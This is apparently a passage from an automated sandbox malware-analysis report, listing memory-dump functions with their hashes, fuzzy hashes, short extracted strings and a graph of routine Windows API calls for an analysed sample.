                                                                                • Opcode Fuzzy Hash: f233da37028f16c0d751b7263edd2cf515b727b31230a761da0381892c0f0645
                                                                                • Instruction Fuzzy Hash: 1E01DB32B101156F8B15DE559840AAF3FEBFBC96A0F54C02AF605D72C4CE71CD119B90
                                                                                Function 02F05E98 Relevance: .0, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0825d049a576ae20511df2d8dc2c95d13e1f99cda6aa536fca2b9b490c3e4f20
                                                                                • Instruction ID: 33609c6bfd2c77c6714883bc3131792d0f8c2583be3d93923417d1c2048ba572
                                                                                • Opcode Fuzzy Hash: 0825d049a576ae20511df2d8dc2c95d13e1f99cda6aa536fca2b9b490c3e4f20
                                                                                • Instruction Fuzzy Hash: E701A472A001196BCB118E55DC81BDF3FAAEB897A0F188026F604D7284DE71C912ABA4
                                                                                Function 02F0ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d66590aece10d13c06b9c66064ee2a0515cdcaa75c8841977b2ace7fb297374f
                                                                                • Instruction ID: 7861439edf453a3dc50cdd5f3dd2d3d84bf4c3610a7774268983945dc5c05e96
                                                                                • Opcode Fuzzy Hash: d66590aece10d13c06b9c66064ee2a0515cdcaa75c8841977b2ace7fb297374f
                                                                                • Instruction Fuzzy Hash: D6F09C327007144B87255A3E9494B2A77DEEFC99D5356807AF709C73A5DF21CC039790
                                                                                Function 02F0E8E8 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 66783baf10556bcc0befcf452118b5e3520c680a381ed420bcba7d719bef348e
                                                                                • Instruction ID: 434263041a4cde86a93a44aff6944842e0f974c58db63be34670014618b3e481
                                                                                • Opcode Fuzzy Hash: 66783baf10556bcc0befcf452118b5e3520c680a381ed420bcba7d719bef348e
                                                                                • Instruction Fuzzy Hash: 39010C74D0020AEFDB45CFA4D985AEEBBB1FB88304F108469D914B3350D7385A56DF92
                                                                                Function 02F028AA Relevance: .0, Instructions: 21COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8b7e6e490055cb427e2a3dc346ff07226f382a92544f1d3348c6bbec43b50a84
                                                                                • Instruction ID: f7850886d5f3e10e805e2a61f0cf130fca11483265cd7977ac7f2c86bd21e8b1
                                                                                • Opcode Fuzzy Hash: 8b7e6e490055cb427e2a3dc346ff07226f382a92544f1d3348c6bbec43b50a84
                                                                                • Instruction Fuzzy Hash: C3E0C232D2022A57CB00EAA1DC408EFB73CEEC2620F804222D85433140EF30765A82B2
                                                                                Function 02F028B0 Relevance: .0, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 15b2c7946d3c6ae741527507417286676d0ae92b819b8e41a3442f2fca6bbf10
                                                                                • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                • Opcode Fuzzy Hash: 15b2c7946d3c6ae741527507417286676d0ae92b819b8e41a3442f2fca6bbf10
                                                                                • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                Function 02F06739 Relevance: .0, Instructions: 18COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9b42d3995050985d5b76fa81c72459ab6453e2c8ea0f8af18b1439b422c53728
                                                                                • Instruction ID: e8a117f653cab15784134cc2b63166e45cfe856d9e1154085d4851ce0e464bc1
                                                                                • Opcode Fuzzy Hash: 9b42d3995050985d5b76fa81c72459ab6453e2c8ea0f8af18b1439b422c53728
                                                                                • Instruction Fuzzy Hash: E6D05E315143250EC641BB35EC8BBD73F6EE7A0221F544960B00A2AA8AEF78588457A6
                                                                                Function 02F0D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fdf1e8dca5d299b67ed0da276791bca1f0f3ee51c7736841d5250b944cf98ef6
                                                                                • Instruction ID: 3a3d315533df509d44c172ecdad99fbc4296320bf88e69744042663c491f5a9f
                                                                                • Opcode Fuzzy Hash: fdf1e8dca5d299b67ed0da276791bca1f0f3ee51c7736841d5250b944cf98ef6
                                                                                • Instruction Fuzzy Hash: 47D0E235E0010CCBCB30DFA8E4854DCFBB0EB89322B10502BE929E3240CA301414CF10
                                                                                Function 02F0AFAD Relevance: .0, Instructions: 16COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7ec14c7d9650f31b3fc77ad8223dad2cbee118f1dadc3662110fcc1b0666dd5e
                                                                                • Instruction ID: a4c0da7616857ac563276e5e184cda6895bc5696ba0ada2218a4f39fab894afc
                                                                                • Opcode Fuzzy Hash: 7ec14c7d9650f31b3fc77ad8223dad2cbee118f1dadc3662110fcc1b0666dd5e
                                                                                • Instruction Fuzzy Hash: 91D0673AB400189FCB149F98E8409DDFB76FB98221B448517F915A3261C6319925DB50
                                                                                Function 02F06748 Relevance: .0, Instructions: 12COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 85007a746b93f955c14f421e8abaa7ff25739039de4e6cd02eb68e6291ea3b16
                                                                                • Instruction ID: 3ea3460d6740d92c41deede2b7513e302c061d9faf23db7e0be0765b3d68824f
                                                                                • Opcode Fuzzy Hash: 85007a746b93f955c14f421e8abaa7ff25739039de4e6cd02eb68e6291ea3b16
                                                                                • Instruction Fuzzy Hash: DFC012305047294EC505FB66EC855553B6EE7A0212B408E71B00A1A95DDF7D1C895791

                                                                                Non-executed Functions

                                                                                Function 02F029E0 Relevance: 5.5, Strings: 4, Instructions: 470COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                • API String ID: 0-2732225958
                                                                                • Opcode ID: bb47e1bfd9a8dcabd052ddc5cc4d80b1d59538f7c527fba17ee7d1eb4d3c3869
                                                                                • Instruction ID: 39559adaf0e32d33c499b6964aa30bcc9efc6a776f4cddbee6e2175d0c179136
                                                                                • Opcode Fuzzy Hash: bb47e1bfd9a8dcabd052ddc5cc4d80b1d59538f7c527fba17ee7d1eb4d3c3869
                                                                                • Instruction Fuzzy Hash: B812A1A29096C08FEF324B7844A43FFBFF1AF87308B8909DAC4D696507DA24941BD754
                                                                                Function 06CF0040 Relevance: 1.8, Strings: 1, Instructions: 596COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .5vq
                                                                                • API String ID: 0-493797296
                                                                                • Opcode ID: cf3aa50dd8982da49cdead94e4ed6db3cce59720ffef6303bfc533dddaafd1ae
                                                                                • Instruction ID: e8e9c0cf40176ce5b8560dc71aa88232c0e0ba10b9843963fccf53875d906747
                                                                                • Opcode Fuzzy Hash: cf3aa50dd8982da49cdead94e4ed6db3cce59720ffef6303bfc533dddaafd1ae
                                                                                • Instruction Fuzzy Hash: 7152BB74E01228CFDB65DF69C894B9DBBB2BB89300F1081EAD509AB354DB359E85CF50
                                                                                Function 06CFE6B0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f43a2f92aa8c6e4fad67854f33d7cfcb21b0cba8909fc365e9410f808beb6769
                                                                                • Instruction ID: b0de0098916bad2f0273c5e03e04f966d942750cf8d65128b61b4be9d00aa292
                                                                                • Opcode Fuzzy Hash: f43a2f92aa8c6e4fad67854f33d7cfcb21b0cba8909fc365e9410f808beb6769
                                                                                • Instruction Fuzzy Hash: 99C1BE74E11218CFDB54DFA5C984B9DBBB2EF89300F1081AAD909AB364DB385E85DF50
                                                                                Function 06CFE258 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 02704cf74b8421e1ec8a06f9743d48db54bf8c29f2f8d70b1280262658d166aa
                                                                                • Instruction ID: 11d0f797fa0007d53f514a6cedafd37bf056a7924adf34edf106f0e38c154479
                                                                                • Opcode Fuzzy Hash: 02704cf74b8421e1ec8a06f9743d48db54bf8c29f2f8d70b1280262658d166aa
                                                                                • Instruction Fuzzy Hash: 33C1BF74E11218CFDB54DFA5C984B9DBBB2EF89300F2081A9D909AB364DB395E85DF10
                                                                                Function 06CFDE00 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0b5d5a2700aab4663878dd096451d8f0829adbf0f4b25356795b2548105545ef
                                                                                • Instruction ID: 3c6e039dc0672b49b4e8d366e5f4d4ea2ebe1010528020a09f93592dc724f29a
                                                                                • Opcode Fuzzy Hash: 0b5d5a2700aab4663878dd096451d8f0829adbf0f4b25356795b2548105545ef
                                                                                • Instruction Fuzzy Hash: 33C1C074E11218CFDB54DFA5C984B9DBBB2EF89300F1081A9D909AB364DB385E85DF50
                                                                                Function 06CFF3B8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dc2ddf71560e317b7c9723c27ea245da414c20549646789c5382a49a5cb177f1
                                                                                • Instruction ID: f7fbbb49adde6cf51442be40d5907e34a3f11851923b623ff88ea30c9471419c
                                                                                • Opcode Fuzzy Hash: dc2ddf71560e317b7c9723c27ea245da414c20549646789c5382a49a5cb177f1
                                                                                • Instruction Fuzzy Hash: CAC1CF74E11218CFDB54DFA5C984B9DBBB2EF89300F2080AAD919AB354DB385E85DF10
                                                                                Function 06CFEF60 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e64263ac540cc38f88382513923c929234d3c87eba661e09d653a39b4f481101
                                                                                • Instruction ID: cb995e6175a475844ce23c6d046fe273787391c76a4e409ac8d30cfe51715f81
                                                                                • Opcode Fuzzy Hash: e64263ac540cc38f88382513923c929234d3c87eba661e09d653a39b4f481101
                                                                                • Instruction Fuzzy Hash: 55C1BF74E11218CFDB54DFA5C984B9DBBB2EF89300F2080A9D919AB354DB389E85DF50
                                                                                Function 06CFEB08 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: ebe1aacd59149de1eb5cd94e241b31921478329ec3ba0553daa790f6d18cfed4
                                                                                • Instruction ID: 63134078cdd073dfb84bc1a24cee149e4a0e18abac0487fab180f46b041a5ab7
                                                                                • Opcode Fuzzy Hash: ebe1aacd59149de1eb5cd94e241b31921478329ec3ba0553daa790f6d18cfed4
                                                                                • Instruction Fuzzy Hash: BAC1B074E11218CFDB94DFA5C984B9DBBB2EF89300F1081A9D909AB364DB385E85DF50
                                                                                Function 06CFD0F8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 33d9c59cdce5dfdac58229871c4b6a4abc96175d22100a5ed9d04771ce963539
                                                                                • Instruction ID: 759dd0defe52a5119f7b53dac793cf432429e55d16e9173266064415bf5aa4c5
                                                                                • Opcode Fuzzy Hash: 33d9c59cdce5dfdac58229871c4b6a4abc96175d22100a5ed9d04771ce963539
                                                                                • Instruction Fuzzy Hash: 97C1DF74E11218CFDB54DFA5C984B9DBBB2EF89300F1080A9D909AB354DB386E85DF10
                                                                                Function 06CFCCA0 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1167a3be0cb6dbc268f59bee37ce7a0a26e02b7dc5f1d3482ac6eb27c6890239
                                                                                • Instruction ID: 20810e7b62dd1e7afb048df986ef1a669f57b164c1cafffb6d0694d544f437e0
                                                                                • Opcode Fuzzy Hash: 1167a3be0cb6dbc268f59bee37ce7a0a26e02b7dc5f1d3482ac6eb27c6890239
                                                                                • Instruction Fuzzy Hash: A1C1CF74E11218CFDB94DFA5C984B9DBBB2EF89300F1080A9D909AB354DB386E85DF50
                                                                                Function 06CFF810 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 134964ced35324666bdb60b89ebc4a2a18252fe06c74d48a312dd171d8257811
                                                                                • Instruction ID: ef00dcef0c84d8da577e06b4eaeae163d6d8fb5c1d4ea196d707b2c633b1496b
                                                                                • Opcode Fuzzy Hash: 134964ced35324666bdb60b89ebc4a2a18252fe06c74d48a312dd171d8257811
                                                                                • Instruction Fuzzy Hash: C7C1CE74E11218CFDB54DFA5C984B9DBBB2EF89300F2080AAD919AB354DB385E85DF50
                                                                                Function 06CFD9A8 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e6b05dd94e965525f6b5686c7757228ee1bb14f6c4d095aecf5305ae7ff5d17d
                                                                                • Instruction ID: 4fdab76cd110ddeb6d8491a8ab4175713f171e48e59e715086a6797efca7b21c
                                                                                • Opcode Fuzzy Hash: e6b05dd94e965525f6b5686c7757228ee1bb14f6c4d095aecf5305ae7ff5d17d
                                                                                • Instruction Fuzzy Hash: 91C1C074E11218CFDB94DFA5C984B9DBBB2EF89300F1081A9D909AB354DB386E85DF10
                                                                                Function 06CFD550 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4156819363.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_6cf0000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: dda1b2c10e971a7b5d00680b0e2df981201e613fbe25a85839315e52be1c8580
                                                                                • Instruction ID: 3ad537dae0c6013770b73f0150e4391a41c888f476fdb3b6db2edd5d3032ca62
                                                                                • Opcode Fuzzy Hash: dda1b2c10e971a7b5d00680b0e2df981201e613fbe25a85839315e52be1c8580
                                                                                • Instruction Fuzzy Hash: 4BC1C074E11218CFDB54DFA5C994B9DBBB2EF89300F1080A9D909AB354DB386E85DF10
                                                                                Function 02F0F970 Relevance: .3, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3f59198a9ce53143af11a0ef4a46b59f9e56b47de196944279e5458877bcf279
                                                                                • Instruction ID: 6df2634b52e0583fd5433aaaa91ea7570f36121678c536fbb731d563ecb7b280
                                                                                • Opcode Fuzzy Hash: 3f59198a9ce53143af11a0ef4a46b59f9e56b47de196944279e5458877bcf279
                                                                                • Instruction Fuzzy Hash: FCC1CF74E11218CFDB64DFA5C994B9DBBB2EF89300F1081A9D909AB394DB385E85DF10
                                                                                Function 02F0F2C0 Relevance: .2, Instructions: 150COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 866a3e475ae4c6c1f36bd57199ca9596583f6860bff74211c2241b788152ec80
                                                                                • Instruction ID: 3b1a865bef1b1bb4774cfea14807f6b5b3080398e12e6a812899e060364169c4
                                                                                • Opcode Fuzzy Hash: 866a3e475ae4c6c1f36bd57199ca9596583f6860bff74211c2241b788152ec80
                                                                                • Instruction Fuzzy Hash: AA515970E01208CBDB24DFA9D9947EEBBB2FB89350F14C229D504BB294DB399885DF54
                                                                                Function 02F0F4AC Relevance: .1, Instructions: 146COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1ba947829bbe94a3d00fec7b1ad76bf54709f2c2dc1b62b407a19a9e728b45b8
                                                                                • Instruction ID: 3ad935f9cd754c3a9ad9c76abb0b106122e4b5cdb89ea46de53e578cd2f37c36
                                                                                • Opcode Fuzzy Hash: 1ba947829bbe94a3d00fec7b1ad76bf54709f2c2dc1b62b407a19a9e728b45b8
                                                                                • Instruction Fuzzy Hash: D3512474E01208CBDB24DFA8D5D47ADBBB2FB49354F209629D905BB684CB399881DF50
                                                                                Function 02F02A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Xbq$Xbq$Xbq$Xbq
                                                                                • API String ID: 0-2732225958
                                                                                • Opcode ID: 7046dd420b4e090bdbcd2c21951a9c16882e9c84e4a2e24d4ce9570fb4aa07c1
                                                                                • Instruction ID: 1d3ad72e112a487a9a33ea29714915ff263e651e43f55c49d16aded78dc9ac59
                                                                                • Opcode Fuzzy Hash: 7046dd420b4e090bdbcd2c21951a9c16882e9c84e4a2e24d4ce9570fb4aa07c1
                                                                                • Instruction Fuzzy Hash: 363153B1E002198BDF758EA9C9C476FB6B6BB54380F544465CA09A73C0DF708985DFA2
                                                                                Function 02F06920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4142613199.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_2f00000_2i3Lj7a8Gk.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                • API String ID: 0-3001612457
                                                                                • Opcode ID: 2d862ef8c9b376c72044e42ddd217171ac6cd11b39a6cbbe7afceb738c8dd3ec
                                                                                • Instruction ID: 456a0f3e0d0aa71c1c809136b1f6ab0edffe00ccf4b66b4a39ba4c481585b409
                                                                                • Opcode Fuzzy Hash: 2d862ef8c9b376c72044e42ddd217171ac6cd11b39a6cbbe7afceb738c8dd3ec
                                                                                • Instruction Fuzzy Hash: 9901B132F001159FCB2C8E2CC4A4A2533EFAF88BA17154469EA46CB7E0DB31DC51D750

                                                                                Execution Graph

                                                                                Execution Coverage:7.6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:33
                                                                                Total number of Limit Nodes:3
                                                                                execution_graph 15070 1734960 15071 1734972 15070->15071 15072 173497e 15071->15072 15074 1734a70 15071->15074 15075 1734a95 15074->15075 15079 1734b71 15075->15079 15083 1734b80 15075->15083 15081 1734ba7 15079->15081 15080 1734c84 15080->15080 15081->15080 15087 173480c 15081->15087 15084 1734ba7 15083->15084 15085 1734c84 15084->15085 15086 173480c CreateActCtxA 15084->15086 15085->15085 15086->15085 15088 1735c10 CreateActCtxA 15087->15088 15090 1735cd3 15088->15090 15091 173d7c0 DuplicateHandle 15092 173d856 15091->15092 15052 173b1f8 15055 173b2e1 15052->15055 15053 173b207 15056 173b324 15055->15056 15057 173b301 15055->15057 15056->15053 15057->15056 15058 173b528 GetModuleHandleW 15057->15058 15059 173b555 15058->15059 15059->15053 15060 173d578 15061 173d5be GetCurrentProcess 15060->15061 15063 173d610 GetCurrentThread 15061->15063 15064 173d609 15061->15064 15065 173d64d GetCurrentProcess 15063->15065 15067 173d646 15063->15067 15064->15063 15066 173d683 15065->15066 15068 173d6ab GetCurrentThreadId 15066->15068 15067->15065 15069 173d6dc 15068->15069

                                                                                Executed Functions

                                                                                Function 0173D568 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 294 173d568-173d607 GetCurrentProcess 298 173d610-173d644 GetCurrentThread 294->298 299 173d609-173d60f 294->299 300 173d646-173d64c 298->300 301 173d64d-173d681 GetCurrentProcess 298->301 299->298 300->301 303 173d683-173d689 301->303 304 173d68a-173d6a5 call 173d747 301->304 303->304 306 173d6ab-173d6da GetCurrentThreadId 304->306 308 173d6e3-173d745 306->308 309 173d6dc-173d6e2 306->309 309->308
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32 ref: 0173D5F6
                                                                                • GetCurrentThread.KERNEL32 ref: 0173D633
                                                                                • GetCurrentProcess.KERNEL32 ref: 0173D670
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0173D6C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1767784592.0000000001730000.00000040.00000800.00020000.00000000.sdmp, Offset: 01730000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_1730000_lyNyKapwZJLKnn.jbxd
                                                                                Similarity
                                                                                • API ID: Current$ProcessThread
                                                                                • String ID:
                                                                                • API String ID: 2063062207-0
                                                                                • Opcode ID: bf13fa51afea8996f6fa78a4211bfd489a2c40957eee1e7282ea6e00619c4095
                                                                                • Instruction ID: 78030d67b4bc3d29087f170943ab95eb884962247c4efca59b0126ba0ce283e6
